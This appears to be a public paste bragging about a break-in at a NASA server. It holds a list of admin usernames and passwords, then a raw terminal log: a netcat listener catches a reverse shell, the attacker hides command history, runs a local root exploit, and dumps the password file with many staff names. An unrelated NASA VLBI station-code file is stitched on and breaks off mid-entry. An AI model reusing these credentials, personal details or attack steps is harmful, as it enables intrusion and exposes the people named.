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Created:Jun 13th, 2019
Created by: Zouma
Views: 2,131
Comments: 7
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- - - ADMIN USERS/PASSES - - - 045508:keller2158 04heinm:aceduke1 508access@majordomo.gsfc.nasa.gov admin:write Andm0n-adm:con05conuserbgov Linux mandalay.arc.nasa.gov 2.6.9-67.0.7.ELsmp #1 SMP x86_64 x86_64 x86_64 GNU/Linux ANASH@spiceware:~# nc -l -vv -p 21 listening on [any] 21 ... connect to [41.x.xxx.xxx] from mandalay.arc.nasa.gov [] 59738 bash -i bash: no job control in this shell bash-3.00$ export HISTFILE=/dev/null bash-3.00$ uname -a;id;w Linux mandalay.arc.nasa.gov 2.6.9-67.0.7.ELsmp #1 SMP x86_64 x86_64 x86_64 GNU/Linux uid=48(apache) gid=48(apache) groups=48(apache) 07:38:36 up 28 days, 14:37, 3 users, load average: 0.95, 0.75, 0.42 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/1 world.arc.nasa.g 20Jan11 2days 0.04s 0.04s -bash root pts/2 world.arc.nasa.g 31Jan11 17days 0.05s 0.05s -bash root pts/3 world.arc.nasa.g 01Feb11 16days 0.03s 0.03s -bash bash-3.00$ Andm0n-adm pass: con05conuserbgov bash-3.00$ cat /etc/issue WARNING! This is a US Government computer. This system is for the use of authorized users only. By accessing and using the computer system you are consenting to system monitoring, including the monitoring of keystrokes. Unauthorized use of, or access to, this computer system may subject you to disciplinary action and criminal prosecution. bash-3.00$ cd / chown -R root:root bin chmod -R 755 bin ai aparece. (13:54) : bash-3.00$ ./ANASH socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Address family not supported by protocol socket: Socket type not supported socket: Address family not supported by protocol sh: no job control in this shell sh-3.00# id uid=0(root) gid=0(root) groups=48(apache) sh-3.00# su bash -i bash: no job control in this shell [root@mandalay linux-sendpage3]# export HISTFILE=/dev/null [root@mandalay linux-sendpage3]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [root@mandalay linux-sendpage3]# sendpage *************************************************************************************************************************** bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin nobody:x:60001:60001:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin admin:x:67:3:Admin Account:/home/admin:/bin/tcsh mysql:x:101:102:MySQL server:/home/mysql:/bin/bash www:x:100:1990:WWW Account:/usr/local/www:/usr/local/bin/tcsh dump:x:103:3:Backup Account:/home/dump:/usr/local/bin/tcsh majordomo:x:200:200:JPL Public Information Office:/home/majordomo:/bin/csh listadm:x:209:200:JPL Public Information Office:/home/listadm:/bin/csh listmaster:x:210:200:JPL Public Information Office:/home/listmaster:/bin/csh gerardo:x:205:1993:Gerardo Rivera:/home/gerardo:/usr/local/bin/tcsh sevak:x:1224:1000:Sevak Gevorkian:/home/sevak:/usr/local/bin/tcsh xxx-rich:x:1247:2000:Rich Pavlovsky:/home/rich:/usr/local/bin/tcsh baalke:x:1315:1996:Ron Baalke:/home/baalke:/usr/local/bin/tcsh baalke2:x:1315:1996:Ron Baalke Dummy Account:/home/baalke2:/usr/local/bin/tcsh pma:x:1793:1990:Paul Andres:/home/pma:/usr/local/bin/tcsh jdyson:x:1935:1990:Jay Dyson:/home/jdyson:/usr/local/bin/bash-exp seal:x:2057:1993:David Seal:/home/seal:/usr/local/bin/tcsh frank:x:2091:2000:Frank O'Donnell:/home/frank:/usr/local/bin/tcsh kcapraro:x:2231:1990:Kris Capraro:/home/kcapraro:/usr/local/bin/tcsh fmelik:x:2241:1990:Frederick Melikian:/home/fmelik:/usr/local/bin/tcsh dtratt:x:2245:1990:Dave Tratt:/home/dtratt:/usr/local/bin/tcsh dcheney:x:2248:1990:Don Cheney:/home/dcheney:/usr/local/bin/tcsh llowes:x:2251:1996:Leslie Lowes:/home/llowes:/usr/local/bin/tcsh domo:x:207:200:JPL Public Information Office:/home/domo:/bin/csh nsun:x:2254:1993:Nien Sun:/home/nsun:/usr/local/bin/tcsh mlane:x:2668:1990:Marc Lane:/home/mlane:/usr/local/bin/tcsh ksberry:x:5254:1996:Kenneth Berry:/home/ksberry:/usr/local/bin/tcsh cchen:x:1156:1000:Cynthia Chen:/home/cchen:/usr/local/bin/tcsh ru:x:17311:1000:Frank Ru:/home/ru:/usr/local/bin/tcsh awong:x:1598:2003:Al Wong:/home/awong:/usr/local/bin/tcsh wwwstat:x:1000:1000:WWW stat:/home/wwwstat:/usr/local/bin/tcsh jplnews:x:900:200:JPL Media Relations Office:/home/jplnews:/usr/local/bin/tcsh cjohnson:x:4865:1990:Charmane S Johnson:/home/cjohnson:/usr/local/bin/tcsh wais:x:998:60001:WAIS Server:/usr/local/wais/home:/bin/csh xxx-sorensen:x:4225:1994:Sugi H Sorensen:/home/sorensen:/usr/local/bin/tcsh-exp000821 chawley:x:4825:1994:Christopher R Hawley:/home/chawley:/usr/local/bin/tcsh hsmith:x:4002:1994:Harman G Smith:/home/hsmith:/usr/local/bin/tcsh aling:x:1554:1994:Annette L Ling:/home/aling:/usr/local/bin/tcsh asohus:x:2235:1994:Anita Sohus:/home/asohus:/usr/local/bin/tcsh rlane:x:685:1000:Robert Lane:/home/rlane:/usr/local/bin/tcsh dominick:x:7462:1990:Dominick Miller:/home/dominick:/usr/local/bin/tcsh jsimmons:x:3614:1990:James L Simmons:/home/jsimmons:/usr/local/bin/tcsh obe:x:9779:1990:David J Oberhettinger:/home/obe:/usr/local/bin/tcsh patrick:x:21944:1990:Patrick Nercessian:/home/patrick:/usr/local/bin/tcsh pxaypras:x:21468:1990:Peter Xaypraseuth:/home/pxaypras:/usr/local/bin/tcsh rbetrue:x:7563:1996:Rosalie Betrue:/home/rbetrue:/usr/local/bin/tcsh lnovati:x:22083:1997:Liliana Novati:/home/lnovati:/usr/local/bin/tcsh dstrayer:x:4015:1990:Donald M Strayer:/home/dstrayer:/usr/local/bin/tcsh hellings:x:2252:1000:Ron Hellings:/home/hellings:/usr/local/bin/tcsh pvanscoy:x:9440:1990:Priscilla Vanscoy:/home/pvanscoy:/usr/local/bin/tcsh jedutra:x:4829:1990:Jayne E Dutra:/home/jedutra:/usr/local/bin/tcsh xxx-meyertr:x:997:1990:Tom Meyer:/home/meyertr:/usr/local/bin/tcsh-exp-000821 sedlacko:x:22631:1998:Daniel S Sedlacko:/home/sedlacko:/usr/local/bin/tcsh brewster:x:1332:1998:Steve Brewster:/home/brewster:/usr/local/bin/tcsh calawshe:x:21831:1990:Cecelia A Lawshe:/home/calawshe:/usr/local/bin/tcsh sokonek:x:9433:2010:Sharon E Okonek:/home/sokonek:/usr/local/bin/tcsh shulme:x:21467:1990:Scott D Hulme:/home/shulme:/usr/local/bin/tcsh jdrose:x:15986:1990:James D Rose:/home/jdrose:/usr/local/bin/tcsh roliver:x:29999:2015:Randii Oliver:/home/roliver:/usr/local/bin/tcsh sjbeck:x:9757:1990:Sandra J Beck:/home/sjbeck:/usr/local/bin/tcsh jsepikas:x:996:2002:John Sepikas:/home/jsepikas:/usr/local/bin/tcsh gmiller:x:995:2002:Glenn Miller:/home/gmiller:/usr/local/bin/tcsh rgrossjr:x:5251:1000:Ronald G Ross Jr:/home/rgrossjr:/usr/local/bin/tcsh xxx-mwhughes:x:202:1990:Michael Hughes:/home/mwhughes:/usr/local/bin/tcsh-exp971021 xxx-amanda:x:203:2000:Amanda Hart:/home/amanda:/usr/local/bin/tcsh.exp970404 xxx-jraven:x:204:1990:John Raven:/home/jraven:/usr/local/bin/tcsh.exp-970326 xxx-morris:x:206:1990:Charles Morris:/home/morris:/usr/local/bin/tcsh-exp971021 xxx-earle:x:1146:2000:Greg Earle:/home/earle:/usr/local/bin/tcsh-exp971021 xxx-chchen:x:1173:1990:Christine Chen:/home/chchen:/exp.961016 xxx-gnoreen:x:1215:1990:Gary Noreen:/home/gnoreen:/usr/local/bin/tcsh-exp971021 xxx-ulysses:x:2232:1990:Khee Chan:/home/ulysses:/usr/local/bin/tcsh-exp971021 xxx-anash:x:2233:1990:Alfred Nash:/home/anash:/usr/local/bin/tcsh-exp971021 xxx-phitch:x:2234:1990:Pauline Hitch:/home/phitch:/usr/local/bin/tcsh.exp-970326 xxx-rdumas:x:2236:1990:Robin Dumas:/home/rdumas:/usr/local/bin/tcsh-exp971021 xxx-arvid:x:2238:1990:Arvid P Croonquist:/home/arvid:/usr/local/bin/tcsh-exp971021 xxx-achen:x:2239:1990:Angela Chen:/home/achen:/usr/local/bin/tcsh-exp971021 xxx-avaisnys:x:2243:1990:Arvydas Vaisnys:/home/avaisnys:/usr/local/bin/tcsh-exp971021 xxx-sgulati:x:2244:1990:Sandeep Gulati:/home/sgulati:/usr/local/bin/tcsh-exp971021 xxx-emcnevin:x:2247:13:Edward "Skip" McNevin:/home/emcnevin:/usr/local/bin/tcsh-exp971021 xxx-dave:x:201:15:Dave Hayes:/home/dave:/usr/local/bin/tcsh-exp971126 xxx-testuser:x:999:10::/tmp/testuser:/bin/csh-exp971126 xxx-flores:x:9999:1000:Mike Flores:/home/flores:/usr/local/bin/tcsh-exp971126 xxx-bocky:x:2249:1996:Rebecca Westbrook:/home/bocky:/usr/local/bin/tcsh-exp971201 xxx-aimee:x:4306:1996:Aimee Martinez:/home/aimee:/usr/local/bin/tcsh-exp971201 xxx-szeluck:x:2246:2000:Stephanie Zeluck:/home/szeluck:/usr/local/bin/tcsh-exp980402 xxx-torg:x:2250:1990:Leigh Torgerson:/home/torg:/usr/local/bin/tcsh-exp980828 xxx-dgilliam:x:1163:1990:David Gilliam:/home/dgilliam:/usr/local/bin/tcsh-exp980828 xxx-pitesky:x:2230:1996:Jo Pitesky:/home/pitesky:/usr/local/bin/tcsh-exp980828 xxx-dubov:x:2242:1990:David Dubov:/home/dubov:/usr/local/bin/tcsh-exp980828 xxx-aguyton:x:2237:1990:Andrew Guyton:/home/aguyton:/usr/local/bin/tcsh-exp980828 xxx-kirk:x:2253:1990:Kirk Goodall:/home/kirk:/usr/local/bin/tcsh-exp980828 xxx-kfeagans:x:1181:1990:Kelly Feagans:/home/kfeagans:/usr/local/bin/tcsh-exp980828 xxx-gdollar:x:2857:1993:Glenn Dollar:/home/gdollar:/usr/local/bin/tcsh-exp980828 xxx-ftp:x:101:60001:Anonymous FTP Account:/usr/local/ftp:/no_such_shell xxx-aholdrid:x:4858:1990:Adam L Holdridge:/home/aholdrid:/usr/local/bin/tcsh-exp980909 xxx-schranck:x:2556:1996:David P Schranck:/home/schranck:/usr/local/bin/tcsh-exp990916 xxx-ptamblyn:x:208:2004:Peter Tamblyn 303-641-5302:/home/ptamblyn:/usr/local/bin/tcsh-exp20010221 xxx-amcgahan:x:19760:1000:ANGELA MCGAHAN:/home/amcgahan:/usr/local/bin/tcsh-exp20020710 epiazza:x:17423:1990:Enrico G Piazza:/home/epiazza:/usr/local/bin/tcsh counter:x:1001:1000:WWW counter:/home/counter:/usr/local/bin/tcsh kilbride:x:16780:1000:Daniel Kilbride:/home/kilbride:/usr/local/bin/tcsh cianci:x:17954:1000:Christopher Cianci:/home/cianci:/usr/local/bin/tcsh buratti:x:8072:1000:BONNIE J BURATTI:/home/buratti:/usr/local/bin/tcsh gscafidi:x:18324:1000:GIA N SCAFIDI:/home/gscafidi:/usr/local/bin/tcsh jwpark:x:19151:1000:JAY W PARK:/home/jwpark:/usr/local/bin/tcsh sreichle:x:19235:2000:SUSAN M REICHLEY:/home/sreichle:/usr/local/bin/tcsh watanabe:x:19235:2000:SUSAN M WATANABE:/home/sreichle:/usr/local/bin/tcsh mailman:x:1008:1008:MAILMAN user:/home/mailman:/usr/local/bin/tcsh lasears:x:19605:1990:LORI A SEARS:/home/lasears:/usr/local/bin/tcsh egramire:x:18006:2003:ERIC G RAMIREZ:/home/egramire:/usr/local/bin/tcsh bsword:x:2599:1000:BETTY J SWORD:/home/bsword:/usr/local/bin/tcsh jlheidec:x:20860:2000:JASON L HEIDECKER:/home/jlheidec:/usr/local/bin/tcsh tknewby:x:17446:1993:TORI NEWBY-GONZALEZ:/home/tknewby:/usr/local/bin/tcsh pramsey:x:9614:1000:PATRICIA A RAMSEY:/home/pramsey:/usr/local/bin/tcsh jlrosa:x:20758:1000:JASON L LA ROSA:/home/jlrosa:/usr/local/bin/tcsh pdistaso:x:4842:1000:PAMELA A DISTASO:/home/pdistaso:/usr/local/bin/tcsh mpwhalen:x:5538:1000:MARK P WHALEN:/home/mpwhalen:/usr/local/bin/tcsh ejkoeber:x:2537:1993:ERNEST J KOEBERLEIN:/home/ejkoeber:/usr/local/bin/tcsh bajohnso:x:15590:1993:BRENT A JOHNSON:/home/bajohnso:/usr/local/bin/tcsh jyibanez:x:20105:1997:JOHN Y IBANEZ:/home/jyibanez:/usr/local/bin/tcsh srbraunh:x:19441:1000:SUSAN R BRAUNHEIM-KALOGERAKOS:/home/srbraunh:/usr/local/bin/tcsh greicius:x:22972:2000:ANTHONY GREICIUS:/home/greicius:/usr/local/bin/tcsh emedina:x:9981:1000:ENRIQUE MEDINA:/home/emedina:/usr/local/bin/tcsh fweb:x:211:2000:Funnel Web configuration home:/home/fweb:/usr/local/bin/tcsh anatha:x:22186:1997:ANILKUMAR M NATHA:/home/anatha:/usr/local/bin/tcsh jwillams:x:15876:1000:JOSEPH L WILLIAMS:/home/jwillams:/usr/local/bin/tcsh jjenkins:x:17091:1000:JEFFREY M JENKINS:/home/jjenkins:/usr/local/bin/tcsh klievens:x:5485:1000:KIMBERLY A LIEVENSE:/home/klievens:/usr/local/bin/tcsh keller:x:212:1000:Kyle James Keller:/home/keller:/usr/local/bin/tcsh mmruiz:x:1320:2003:MYRIAM M RUIZ:/home/mmruiz:/usr/local/bin/tcsh evanm:x:1154:2010:Evan M Manning:/home/evanm:/usr/local/bin/tcsh dfdoody:x:2425:1000:David F Doody:/home/dfdoody:/usr/local/bin/tcsh cweiss:x:9962:1000:Charlotte M Weiss:/home/cweiss:/usr/local/bin/tcsh ccheung:x:5248:1000:Cara M Cheung:/home/ccheung:/usr/local/bin/tcsh dhester:x:9884:1000:Jean Hester:/home/dhester:/usr/local/bin/tcsh kmunsell:x:21449:1000:Kirk Munsell:/home/kmunsell:/usr/local/bin/tcsh aangrum:x:4304:1000:ANDREA ANGRUM:/home/aangrum:/usr/local/bin/tcsh hkline:x:19992:1000:Henry Kline II:/home/hkline:/usr/local/bin/tcsh cweaver:x:17736:1000:Christopher A Weaver:/home/cweaver:/usr/local/bin/tcsh tsmith:x:4787:1000:TERESA M SMITH:/home/tsmith:/usr/local/bin/tcsh boks:x:24501:1000:Boris Oks:/home/boks:/usr/local/bin/tcsh arader:x:26439:2000:Andrew S Rader:/home/arader:/usr/local/bin/tcsh rludwig:x:17337:1000:Roger Ludwig:/home/rludwig:/usr/local/bin/tcsh ahernand:x:19082:1000:ANDY HERNANDEZ:/home/ahernand:/usr/local/bin/tcsh cmickels:x:26218:1000:CORY M MICKELSON:/home/cmickels:/usr/local/bin/tcsh mdavisa:x:25304:2015:MARYIA S DAVIS:/home/mdavisa:/usr/local/bin/tcsh mperez5:x:29206:2000:MARTIN PEREZ:/home/mperez5:/usr/local/bin/tcsh ccuno:x:18302:2000:CYNTHIE CUNO:/home/ccuno:/usr/local/bin/tcsh clkarpin:x:9727:2001:CORINNE L KARPINSKI:/home/clkarpin:/usr/local/bin/tcsh jmziats:x:5542:1000:JOHN M ZIATS:/home/jmziats:/usr/local/bin/tcsh mpence:x:28783:1000:MICHAEL L PENCE:/home/mpence:/usr/local/bin/tcsh rholland:x:22551:1000:ROBERT J HOLLAND:/home/rholland:/usr/local/bin/tcsh kgowey:x:1960:1000:KENNETH T GOWEY:/home/kgowey:/bin/csh jchan:x:27603:2000:JONATHAN G CHAN:/home/jchan:/bin/csh gangl:x:1967:1000:MICHAEL E GANGL:/home/gangl:/usr/local/bin/tcsh biferno:x:1968:1000:ANYA A BIFERNO:/home/biferno:/usr/local/bin/tcsh ajnorton:x:1969:1000:AMBER J NORTON:/home/ajnorton:/usr/local/bin/tcsh theimer:x:40972:2000:JOSHUA P THEIMER:/home/theimer:/usr/local/bin/tcsh jhjones:x:25851:1000:JANE HOUSTON JONES:/home/jhjones:/usr/local/bin/tcsh gsherman:x:25855:1000:GLENDA H SHERMAN:/home/gsherman:/usr/local/bin/tcsh laespino:x:42348:2000:LUIS A ESPINOZA:/home/laespino:/bin/tcsh mwho:x:43162:2000:MELODY W HO:/home/mwho:/usr/local/bin/tcsh kmorr:x:43361:2000:KIMBERLY M ORR:/home/kmorr:/usr/local/bin/tcsh manukyan:x:26331:0:GEGHAM MANUKYAN:/home/manukyan:/opt/local/bin/bash sjcrane:x:42196:2018:STEPHEN J CRANE:/home/sjcrane:/usr/local/bin/tcsh afitzpat:x:42424:1997:AUSTIN J FITZPATRICK:/home/afitzpat:/usr/local/bin/tcsh smerrill:x:1157:2018:SUSAN J MERRILL:/home/smerrill:/usr/local/bin/tcsh dkfisher:x:2240:1997:DIANE K FISHER:/home/dkfisher:/usr/local/bin/tcsh jabrea:x:1343:1000:James Abrea:/home/jabrea:/usr/local/bin/tcsh jarca:x:31298:2000:JEREMY M ARCA:/home/jarca:/usr/local/bin/tcsh canna:x:39:39:Canna Service User:/var/lib/canna:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin sguthein:x:4131:2000:SANDY C GUTHEINZ:/home/sguthein:/bin/tcsh kldodge:x:11435:2000:KYLE L DODGE:/home/kldodge:/bin/tcsh jlim:x:44021:2022:JEFFREY LIM:/home/jlim:/bin/tcsh dgrigori:x:44240:2018:DRO S GRIGORIAN:/home/dgrigori:/bin/tcsh spambucket:x:901:1000:Spam Box User:/home/spambucket:/sbin/nologin defang:x:902:1000:MIMEDefang User:/var/spool/MIMEDefang:/sbin/nologin jdnelson:x:45258:1000:JON D NELSON:/home/jdnelson:/bin/tcsh *************************************************************************************************************************** * ns-codes.txt 010717 format ******************************************************************* * * * ns-codes.txt IVS Network Station codes * * * ******************************************************************* * * This file is ns-codes.txt in [REDACTED] * Copies are in directory vlbi/ivscontrol on the IVS data centers. * * Maintenance: * This file is maintained by the IVS Coordinating Center. Send * corrections and request additions to the lists from * ivscc@ivscc.gsfc.nasa.gov. The Coordinating Center will * provide assistance by assigning codes and requesting CDP * and DOMES numbers for new stations. * * Contents for each site: * 2-letter code * 8-letter station name * DOMES number * CDP number * Comments/descriptions * The names and codes are used in geodetic VLBI scheduling, * correlation processing, and analysis. * * Non-IVS station information: * The file also contains codes and names for non-IVS stations that * are used in astronomical observing. Codes and names for historical * mobile antenna sites are included because these data are still * being analyzed. * * This file is alphabetically ordered by the 2-letter code. * * The fields in this file are not column sensitive. Fields are * delimited by blanks. * * Last updated: * 990512 nrv Initial version * 000920 nrv Add more domestic Japanese stations. * 001003 nrv Change name of Syowa antenna to SYOWA. * 001130 nrv Add TIGO at Concepcion as Tc TIGOCONC. * 001130 nrv Change Chichi code to Cc. Add GIFU3 as Gi. * 010322 nrv Add DSS13. * 010406 nrv Add CEDUNA and MOPRA. * 010418 nrv Add DOMES numbers as the third field. * 010620 nrv Add some mobile antenna sites and some astronomy sites. * Data taken from GSFC version of antenna.dat file, and * from sked's position.cat file.. * 010625 nrv Complete the list from antenna.dat and position.cat. * Added astronomy 2-letter codes. * 010628 nrv Corrected NRAO station names. * 010717 nrv Remove duplicate 8-letter code names for CAMBRIDG and * EFLSBERG. * 010723 nrv Corrected EFLSBERG Domes, GRASSE info, MIYAZAKI name, * METSHOVI code, added TSUKU3. * 010807 nrv Correct METSHOVI name spelling. * 010808 nrv Add code Va for "VLBA all 10 stations". This code is * for use in the Master Files where it is lengthy to * list all 10 station codes. * 010905 nrv Correct descriptions for DSS45 and DSS65. * 011002 nrv Add GBT_VLBA name for Gt. * 011031 nrv Add SVETLOE and ZELENCHK per info from Z. Malkin. * 011212 nrv Add CDP number for GBT_VLBA from C. Noll. * 020617 nrv Add DOMES number for TIGO.0617 nrv Add DOMES number for TIGO. * 020702 nrv Add K3/KOGANEI3 and KZ/KANOZAN for Japanese sites found in * old databases. * 021023 nrv Add CDP numbers for K3 and Kz. * 021218 nrv Add CTVASBAY. * 030109 nrv Add GIFU11 for the 11-m at Gifu University. * 030110 nrv Add DOMES numbers for KANOZAN, KOGANEI3, GIFU11. * 030305 nrv Add DOMES number for CTVSTJ, CDP numbers for Sb and Ss. * 030317 nrv Change 8-letter name for Metsahovi astronomy antenna * so it doesn't conflict with mobile occupation. * 030325 nrv Change GBT_VLBA to GBT-VLBA. * 030507 nrv Add DOMES number for GBT. * 030630 nrv Add four VERA stations. * 030814 nrv Add TOMAKO11. * 030826 nrv Add DOMES for Tomakomai * 031008 nrv Add DOMES for VERA stations * 031114 nrv Add KAINAN for GSI, 5-m mobile site. * 040309 nrv Fix mis-typed METSAHOV spelling (astronomy antenna). * 040310 nrv Add CDP number for METSAHOV. * 040323 nrv Add YAMAGUCH and VLA-N8. Add CDP numbers for these. * 040324 nrv Add DOMES numbver for VLA-N8. * 040325 nrv Add DOMES number for YAMAGUCH. * 040329 nrv Add DOMES number for METSAHOV. * 041208 dbb Add Badary. * 050115 dbb Add DOMES number for BADARY. * 050921 dbb Add DSS65A (DSS65 was moved by about 61 m from its * original location. DSS65A is DSS65 at new location.) * 051007 dbb Add CDP number for DSS65A. * 051026 dbb Add DOMES number for DSS65A. * 060206 dbb Add DOMES number for CTVASBAY. * 070202 dbb Add CDP number for DSS13. * 070801 dbb Add DOMES number for DSS13. * 070816 dbb Add YEBES40M (40-m antenna at Yebes). * 070823 dbb Add DOMES number for YEBES40M. * 081014 dbb Add 2-letter code Ww for Warkworth in New Zealand. * 091020 dbb Add 2-letter and 8-letter codes for AuScope 12-m antennas * at Katherine, Yarragadee, and Hobart. * 101101 dgg Add DOMES and CDP numbers for HOBART12. * 101115 dbb Add DOMES and CDP numbers for KATH12M. * 101115 dbb Add DOMES and CDP numbers for YARRA12M. * 110107 dbb Correct DOMES number for DSS13. * 110214 dbb Add UCHINOUR (34-m at Uchinoura Space Observatory, Japan). * 110216 dbb Add DOMES number for UCHINOUR. * 110617 dbb Add CDP number for WARK12M. * 110623 dbb Add DOMES number for WARK12M. * 110624 dbb Add GGAO12M (12-m GSFC Greenbelt, MD, USA). * 110630 dbb Add CDP number for GGAO12M. * 110711 dbb Retire 2-letter code 'Km' for 12-m antenna Kitt Peak, AZ, USA. * 110711 dbb Add 40-m antenna at Kunming, China as Km KUNMING. * 110722 dbb Correct DOMES numbers for HOBART12, KATH12M, and YARRA12M. * 110825 dbb Add CDP number for KUNMING. * 110829 dbb Add DOMES numbers for KUNMING and GGAO12M. * * Fields: * 1. IVS 2-letter code. Not case sensitive, although the initial * letter is usually capitalized for readability. * 2. IVS Station name, max 8 characters. Usually all caps. A field * of -------- means this station has no name assigned; these are * usually astronomy stations that have not been used for geodesy. * 3. DOMES number of the form [site #][type][local monument #] * type S is an intersection of axes, type M is a ground marker. * A field of -------- means no DOMES number has been assigned. * 4. CDP monument number, 4 digits. A field of ---- means * no CDP number has been assigned. * 5 and following. Brief description or location. * *C- Name---- --DOMES-- CDP- Comments/description *cc nnnnnnnn ssssstmmm mmmm ----------------------------------- 13 DSS13 40405S039 1516 34-m at Goldstone, CA, USA 14 GOLDMARS 40405S001 1514 70-m DSS14 at Goldstone, CA, USA 15 DSS15 40405S019 1515 34-m HEF at Goldstone, CA, USA 43 DSS43 --------- ---- 34-m Australia 45 DSS45 50103S010 1545 34-m HEF at Tidbinbilla, Australia 61 ROBLED32 13407S003 1561 DSS61 Robledo, Spain 65 DSS65 13407S010 1565 34-m HEF at Madrid, Spain 6a DSS65A 13407S014 1567 34-m HEF at Madrid, Spain (new location) Ai AIRA 21742S002 7348 Aira, Kagoshima, Japan Ap ALGOPARK 40104S001 7282 Algonquin Park, Canada Ar ARECIBO --------- ---- Arecibo, Puerto Rico, USA As -------- --------- ---- Alice Springs, Australia At ATCA --------- ---- ATCA, Culgoora, Australia Au AUSTINTX 40412M003 7271 mobile Austin, TX, USA Az AZORES 31906M001 7609 mobile Azores islands Ba -------- --------- ---- Bangalore, India Bd BADARY 12338S003 7382 Badary, Russia Bb BLKBUTTE 40430M001 7269 mobile Black Butte, CA, USA Be BERMUDA 42501M002 7294 mobile Bermuda island Bl -------- --------- ---- Bear Lakes, Russia Bo BLOOMIND 40452M001 7291 mobile Bloomington, IN, USA Br BR-VLBA 40473S001 7614 VLBA at Brewster, WA, USA Bs BREST 10004M002 7604 mobile Brest, France Ca CAMBRIDG --------- ---- Cambridge, UK (Cb=Ryle,C4=Mk4,Ca=VLBA) Cc CHICHI10 21732S004 7347 10-m at Chichijima, Ogasawara, Japan Cd CEDUNA --------- ---- ATNF, Ceduna, Australia Ce CEBRER26 --------- ---- DSS62 Robledo, Spain Cg CARROLGA 40453M001 7228 mobile Carrollton, GA, USA Ch CHLBOLTN 13201S002 7215 Chilbolton, England Cn CARNUSTY 13296M002 7603 mobile Carnusty, England Da DAITO 21738S001 7326 Daito Islands, Japan Dm DEADMANL 40431M001 7267 mobile Deadman Lake, CA, USA Dw WESTBRK0 --------- ---- Dwingeloo, Netherlands Eb EFLSBERG 14209S001 7203 Effelsberg, Germany (Eb=VLBA, Ef=Mk4) El ELY 40432M001 7286 mobile Ely, NV, USA Ev -------- --------- ---- Evpatoria, Ukraine Fd FD-VLBA 40442S017 7613 VLBA at Ft. Davis, TX, USA Fl FLAGSTAF 40491M003 7261 mobile Flagstaff, AZ, USA Fo FORT_ORD 40427M001 7266 mobile Sand City, CA, USA Fs FORTORDS 40427M002 7241 mobile south Sand City, CA, USA Ft FORTLEZA 41602S001 7297 Fortaleza, Brazil G1 NRAO85_1 40441S005 7248 85-1 NRAO Green Bank, WV, USA G3 NRAO85_3 40441S004 7214 85-3 NRAO Green Bank, WV, USA Ga VLBA85_3 40441S004 7214 85-1 antenna (different equipment) Gb NRAO_140 40441S001 7204 140-ft NRAO Green Bank, WV, USA Gc GILCREEK 40408S002 7225 Gilmore Creek, Fairbanks, AK, USA Gd WIDE85_3 40441S004 7214 81-3 antenna (different equipment) Gf GORF7102 40451M102 7102 ORION MV3 at Greenbelt, MD, USA Gg GGAO7108 40451M125 7108 ORION MV3 at Greenbelt, MD, USA Gi GIFU3 21747S001 7354 3-m at Gifu Univ., Japan Gu GIFU11 21747S002 7361 11-m at Gifu Univ., Japan (formerly at Tateyama) Gm -------- --------- ---- GMRT phased, Narayan Gaon, India Gn NRAO20 40441S007 7208 20-m at NRAO Green Bank, WV, USA Go -------- --------- ---- Goldstone, CA, USA Gr GRASSE 10002M003 7605 mobile Grasse, France Gs GGAO12M 40451S177 7622 12-m GSFC Greenbelt, MD, USA Gt GBT-VLBA 40441S008 7200 100-m at NRAO Green Bank, WV, USA Gv GOLDVENU 40405S014 1513 This antenna was replaced by DSS13. Gz -------- --------- ---- Tracking antenna, Goldstone, CA, USA H7 FTD_7900 40442M009 7900 Fort Davis, TX, USA Hb HOBART12 50116S007 7374 12-m at Hobart, Tasmania, Australia Hc HATCREEK 40489S001 7218 Hat Creek, CA, USA Hf HOFN 10204M001 7635 mobile Hofn, Iceland Hg HOHENFRG 14202M002 7600 Hohenbunstorf, Germany Hh HARTRAO 30302S001 7232 Hartebeesthoek, South Africa Hk HALEAKAL 40445M002 7120 mobile Haleakala, HI, USA Hn HN-VLBA 40471S001 7618 VLBA at Hancock, NH, USA Ho HOBART26 50116S002 7242 Hobart, Tasmania, Australia Hp HOHNBERG 14213M002 7630 Hohenpeissenberg, Germany Hr HRAS_085 40442S003 7216 HRAS at Fort Davis, TX, USA Hs HAYSTACK 40440S002 7205 Haystack, Westford, MA, USA It ITAPETGA --------- ---- Itapetinga, Brazil J1 JPL_MV1 40400M003 7263 MV1 at JPL, Pasadena, CA, USA Jb JODRELL2 --------- ---- Mk4, Jodrell Bank, UK Jv JODRELL2 --------- ---- VLBA, Jodrell Bank, UK Ky KAINAN 21715M001 7350 5-m mobile at Kainan, Wakayama, Japan K1 KASHIM11 21701S006 7334 11-m 